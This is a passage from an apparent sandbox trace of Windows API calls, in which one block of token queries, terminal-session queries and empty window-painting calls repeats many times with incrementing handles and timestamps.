pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.199] WTSFreeMemory (pMemory=0x0) [0072.199] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.199] TextOutW (hdc=0x0, x=1744, y=4124, lpString="", c=0) returned 1 [0072.199] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.199] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.199] GetTickCount () returned 0x1f23a [0072.200] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.200] SetForegroundWindow (hWnd=0x0) returned 0 [0072.200] BringWindowToTop (hWnd=0x0) returned 0 [0072.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4ec) returned 1 [0072.200] GetTokenInformation (in: TokenHandle=0x4ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.200] GetLastError () returned 0x7a [0072.200] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.200] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.201] WTSFreeMemory (pMemory=0x0) [0072.201] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.201] TextOutW (hdc=0x0, x=1754, y=4149, lpString="", c=0) returned 1 [0072.201] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.201] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.201] GetTickCount () returned 0x1f23a [0072.202] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.202] SetForegroundWindow (hWnd=0x0) returned 0 [0072.202] BringWindowToTop (hWnd=0x0) returned 0 [0072.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4f0) returned 1 [0072.202] GetTokenInformation (in: TokenHandle=0x4f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.202] GetLastError () returned 0x7a [0072.202] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.202] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.203] WTSFreeMemory (pMemory=0x0) [0072.203] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.203] TextOutW (hdc=0x0, x=1764, y=4174, lpString="", c=0) returned 1 [0072.203] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.203] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.203] GetTickCount () returned 0x1f23a [0072.205] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.205] SetForegroundWindow (hWnd=0x0) returned 0 [0072.205] BringWindowToTop (hWnd=0x0) returned 0 [0072.205] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4f4) returned 1 [0072.205] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.205] GetLastError () returned 0x7a [0072.205] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.205] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.209] WTSFreeMemory (pMemory=0x0) [0072.209] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.209] TextOutW (hdc=0x0, x=1774, y=4199, lpString="", c=0) returned 1 [0072.209] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.209] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.209] GetTickCount () returned 0x1f24a [0072.212] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.212] SetForegroundWindow (hWnd=0x0) returned 0 [0072.212] BringWindowToTop (hWnd=0x0) returned 0 [0072.213] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4f8) returned 1 [0072.213] GetTokenInformation (in: TokenHandle=0x4f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.213] GetLastError () returned 0x7a [0072.213] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.213] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.213] WTSFreeMemory (pMemory=0x0) [0072.213] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.214] TextOutW (hdc=0x0, x=1784, y=4224, lpString="", c=0) returned 1 [0072.214] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.214] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.214] GetTickCount () returned 0x1f24a [0072.215] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.215] SetForegroundWindow (hWnd=0x0) returned 0 [0072.215] BringWindowToTop (hWnd=0x0) returned 0 [0072.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x4fc) returned 1 [0072.215] GetTokenInformation (in: TokenHandle=0x4fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.215] GetLastError () returned 0x7a [0072.215] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.215] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.216] WTSFreeMemory (pMemory=0x0) [0072.216] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.216] TextOutW (hdc=0x0, x=1794, y=4249, lpString="", c=0) returned 1 [0072.216] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.216] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.216] GetTickCount () returned 0x1f24a [0072.217] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.217] SetForegroundWindow (hWnd=0x0) returned 0 [0072.217] BringWindowToTop (hWnd=0x0) returned 0 [0072.217] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x500) returned 1 [0072.217] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.217] GetLastError () returned 0x7a [0072.217] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.217] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.218] WTSFreeMemory (pMemory=0x0) [0072.218] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.218] TextOutW (hdc=0x0, x=1804, y=4274, lpString="", c=0) returned 1 [0072.218] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.218] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.218] GetTickCount () returned 0x1f24a [0072.219] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.220] SetForegroundWindow (hWnd=0x0) returned 0 [0072.220] BringWindowToTop (hWnd=0x0) returned 0 [0072.220] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x504) returned 1 [0072.220] GetTokenInformation (in: TokenHandle=0x504, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.220] GetLastError () returned 0x7a [0072.220] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.220] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.220] WTSFreeMemory (pMemory=0x0) [0072.220] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.220] TextOutW (hdc=0x0, x=1814, y=4299, lpString="", c=0) returned 1 [0072.220] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.221] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.221] GetTickCount () returned 0x1f24a [0072.227] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.227] SetForegroundWindow (hWnd=0x0) returned 0 [0072.227] BringWindowToTop (hWnd=0x0) returned 0 [0072.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x508) returned 1 [0072.227] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.227] GetLastError () returned 0x7a [0072.227] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.227] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.228] WTSFreeMemory (pMemory=0x0) [0072.228] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.228] TextOutW (hdc=0x0, x=1824, y=4324, lpString="", c=0) returned 1 [0072.228] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.228] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.228] GetTickCount () returned 0x1f25a [0072.229] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.229] SetForegroundWindow (hWnd=0x0) returned 0 [0072.230] BringWindowToTop (hWnd=0x0) returned 0 [0072.230] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x50c) returned 1 [0072.230] GetTokenInformation (in: TokenHandle=0x50c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.230] GetLastError () returned 0x7a [0072.230] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.230] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.230] WTSFreeMemory (pMemory=0x0) [0072.230] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.230] TextOutW (hdc=0x0, x=1834, y=4349, lpString="", c=0) returned 1 [0072.230] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.231] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.231] GetTickCount () returned 0x1f25a [0072.231] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.232] SetForegroundWindow (hWnd=0x0) returned 0 [0072.232] BringWindowToTop (hWnd=0x0) returned 0 [0072.232] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x510) returned 1 [0072.232] GetTokenInformation (in: TokenHandle=0x510, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.232] GetLastError () returned 0x7a [0072.232] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.232] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.232] WTSFreeMemory (pMemory=0x0) [0072.232] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.233] TextOutW (hdc=0x0, x=1844, y=4374, lpString="", c=0) returned 1 [0072.233] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.233] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.233] GetTickCount () returned 0x1f25a [0072.235] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.235] SetForegroundWindow (hWnd=0x0) returned 0 [0072.235] BringWindowToTop (hWnd=0x0) returned 0 [0072.235] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x514) returned 1 [0072.235] GetTokenInformation (in: TokenHandle=0x514, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.235] GetLastError () returned 0x7a [0072.235] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.235] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.236] WTSFreeMemory (pMemory=0x0) [0072.236] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.236] TextOutW (hdc=0x0, x=1854, y=4399, lpString="", c=0) returned 1 [0072.236] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.236] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.236] GetTickCount () returned 0x1f25a [0072.237] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.237] SetForegroundWindow (hWnd=0x0) returned 0 [0072.237] BringWindowToTop (hWnd=0x0) returned 0 [0072.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x518) returned 1 [0072.238] GetTokenInformation (in: TokenHandle=0x518, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.238] GetLastError () returned 0x7a [0072.238] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.238] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.239] WTSFreeMemory (pMemory=0x0) [0072.239] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.239] TextOutW (hdc=0x0, x=1864, y=4424, lpString="", c=0) returned 1 [0072.239] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.239] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.239] GetTickCount () returned 0x1f269 [0072.240] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.241] SetForegroundWindow (hWnd=0x0) returned 0 [0072.241] BringWindowToTop (hWnd=0x0) returned 0 [0072.241] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x51c) returned 1 [0072.241] GetTokenInformation (in: TokenHandle=0x51c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.241] GetLastError () returned 0x7a [0072.241] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.241] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.241] WTSFreeMemory (pMemory=0x0) [0072.241] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.242] TextOutW (hdc=0x0, x=1874, y=4449, lpString="", c=0) returned 1 [0072.242] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.242] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.242] GetTickCount () returned 0x1f269 [0072.242] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.242] SetForegroundWindow (hWnd=0x0) returned 0 [0072.242] BringWindowToTop (hWnd=0x0) returned 0 [0072.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x520) returned 1 [0072.243] GetTokenInformation (in: TokenHandle=0x520, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.243] GetLastError () returned 0x7a [0072.243] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.243] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.243] WTSFreeMemory (pMemory=0x0) [0072.243] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.243] TextOutW (hdc=0x0, x=1884, y=4474, lpString="", c=0) returned 1 [0072.243] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.243] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.243] GetTickCount () returned 0x1f269 [0072.244] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.244] SetForegroundWindow (hWnd=0x0) returned 0 [0072.244] BringWindowToTop (hWnd=0x0) returned 0 [0072.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x524) returned 1 [0072.244] GetTokenInformation (in: TokenHandle=0x524, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.244] GetLastError () returned 0x7a [0072.244] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.245] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.245] WTSFreeMemory (pMemory=0x0) [0072.245] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.245] TextOutW (hdc=0x0, x=1894, y=4499, lpString="", c=0) returned 1 [0072.245] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.245] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.245] GetTickCount () returned 0x1f269 [0072.249] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.250] SetForegroundWindow (hWnd=0x0) returned 0 [0072.250] BringWindowToTop (hWnd=0x0) returned 0 [0072.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x528) returned 1 [0072.250] GetTokenInformation (in: TokenHandle=0x528, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.250] GetLastError () returned 0x7a [0072.250] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.250] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.251] WTSFreeMemory (pMemory=0x0) [0072.251] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.251] TextOutW (hdc=0x0, x=1904, y=4524, lpString="", c=0) returned 1 [0072.251] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.251] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.251] GetTickCount () returned 0x1f269 [0072.259] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.259] SetForegroundWindow (hWnd=0x0) returned 0 [0072.259] BringWindowToTop (hWnd=0x0) returned 0 [0072.259] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x52c) returned 1 [0072.259] GetTokenInformation (in: TokenHandle=0x52c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.259] GetLastError () returned 0x7a [0072.259] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.259] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.260] WTSFreeMemory (pMemory=0x0) [0072.260] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.260] TextOutW (hdc=0x0, x=1914, y=4549, lpString="", c=0) returned 1 [0072.260] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.260] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.260] GetTickCount () returned 0x1f279 [0072.261] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.261] SetForegroundWindow (hWnd=0x0) returned 0 [0072.261] BringWindowToTop (hWnd=0x0) returned 0 [0072.261] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x530) returned 1 [0072.261] GetTokenInformation (in: TokenHandle=0x530, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.261] GetLastError () returned 0x7a [0072.261] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.261] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.262] WTSFreeMemory (pMemory=0x0) [0072.262] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.262] TextOutW (hdc=0x0, x=1924, y=4574, lpString="", c=0) returned 1 [0072.262] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.262] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.262] GetTickCount () returned 0x1f279 [0072.265] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.266] SetForegroundWindow (hWnd=0x0) returned 0 [0072.266] BringWindowToTop (hWnd=0x0) returned 0 [0072.266] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x534) returned 1 [0072.266] GetTokenInformation (in: TokenHandle=0x534, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.266] GetLastError () returned 0x7a [0072.266] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.266] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.267] WTSFreeMemory (pMemory=0x0) [0072.267] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.267] TextOutW (hdc=0x0, x=1934, y=4599, lpString="", c=0) returned 1 [0072.267] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.267] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.267] GetTickCount () returned 0x1f279 [0072.270] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.270] SetForegroundWindow (hWnd=0x0) returned 0 [0072.270] BringWindowToTop (hWnd=0x0) returned 0 [0072.270] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x538) returned 1 [0072.271] GetTokenInformation (in: TokenHandle=0x538, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.271] GetLastError () returned 0x7a 